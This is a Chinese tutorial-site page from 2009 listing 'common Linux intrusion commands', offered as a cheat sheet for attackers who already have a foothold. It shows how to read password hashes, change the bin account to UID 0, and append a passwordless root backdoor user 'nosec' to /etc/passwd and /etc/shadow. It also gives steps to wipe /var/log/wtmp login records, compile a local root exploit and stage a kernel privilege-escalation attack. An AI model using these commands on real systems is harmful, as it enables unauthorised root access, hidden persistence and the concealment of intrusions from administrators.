当前位置: 首页 > 图文教程 > 服务器 > Linux服务器 > linux 入侵常用命令汇编

Linux服务器
linux下用cron定时执行任务的方法
.htaccess绑定域名到子目录的方法
linux apache下虚拟主机配置方法
apache 局域网访问配置方案
linux Apache服务器系统安全设置与优化
linux中mac地址绑定方法
linux托盘不断闪烁之解决方法
Apache配置 虚拟转向实例
Apache No space left on device的解决办法
Apache rewrite的重写相关的参数说明
LINUX入门级常用命令20条整理
Ubuntu设置开机自动挂载所有格式硬盘分区
5个可能被你忽略的Linux安全设置方法
学习Apache的mod rewrite、access写法
改版时保留原链接,创建新的URL的方法
rsync中文手册之使用rsync实现网站镜像和备份linux
rsync 数据同步使用详解
linux URL的301重定向代码分析
eclipse3.2.2 + MyEclipse5.5 + Tomcat5.5.27 配置数据库连接池
Apache服务器二级域名的完美实现

Linux服务器 中的 linux 入侵常用命令汇编


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-04   浏览: 80 ::
收藏到网摘: n/a

掌握这些命令也有助于配置linux的安全,大家可以看看。 cat /etc/passwd 查看linux用户
  cat /etc/shadow 查看用户密码需要root权限
  cat /etc/sysconfig/network-scripts/ifcfg-ethn N代表网卡号 查看所在网卡的ip信息
  ifconfig 查看本机ip信息
  cat /etc/resolv.conf 查看DNS信息
  bash -i 在反弹的shell中使用可以直观显示命令
  bash prompt: 当你以普通限权用户身份进入的时候,一般你会有一个类似bash$的prompt。当你以Root登陆时,你的prompt会变成
  bash#。
  系统变量 : 试着echo "$USER / $EUID" 系统应该会告诉你它认为你是什么用户。
  echo 1>/proc/sys/net/ipv4/if_forward是不是你写错了,应该是echo 1>/proc/sys/net/ipv4/ip_forward,
  vim /proc/sys/net/ipv4/ip_forward 吧,默认是0,也就是内核不进行数据包过滤,改为1 ,让内核对数据包进行filter处理!
  netstat -an |grep LISTEN |grep :80 查看端口
  service --status-all | grep running
  service --status-all | grep http
  查看运行服务
  lsb_release -a 查看系统版本
  重启ssh服务 :/usr/sbin/sshd stop
  /usr/sbin/sshd start
  ssd_config文件里
  PasswordAuthentication no,
  将其改为
  PasswordAuthentication yes
  远程ssh才可登录
  否则显示Access denied
  其中Usepam yes可能用来建立pam方式login,比如从其它linux主机ssh到服务端,如果关闭,则不能打开.
  su的菜鸟用法
  先chomod 777 /etc/passwd
  然后修改bin用户的gid和uid为0
  然后passwd设置bin的密码
  然后cp /bin/bash /sbin/nologin
  然后su的时候su - bin就可以到rootshell了。
  这个原理就是当ssh不允许root用ssh终端登陆的时候,我们又不知道root密码,的一种很菜鸟的做法
  还可以这样
  sed -i s/bin:x:1:1/bin:x:0:1/g /etc/passwd
  gcc prtcl2.c –o local –static –Wall
  echo "nosec:x:0:0::/:/bin/sh" >> /etc/passwd
  echo "nosec::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow
  清空last记录 cp /dev/null /var/log/wtmp
  -----
  dd if=/dev/zero of=yourfile bs=10M count=10 建立一个100m的大文件在利用Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit提权的时候要用到的。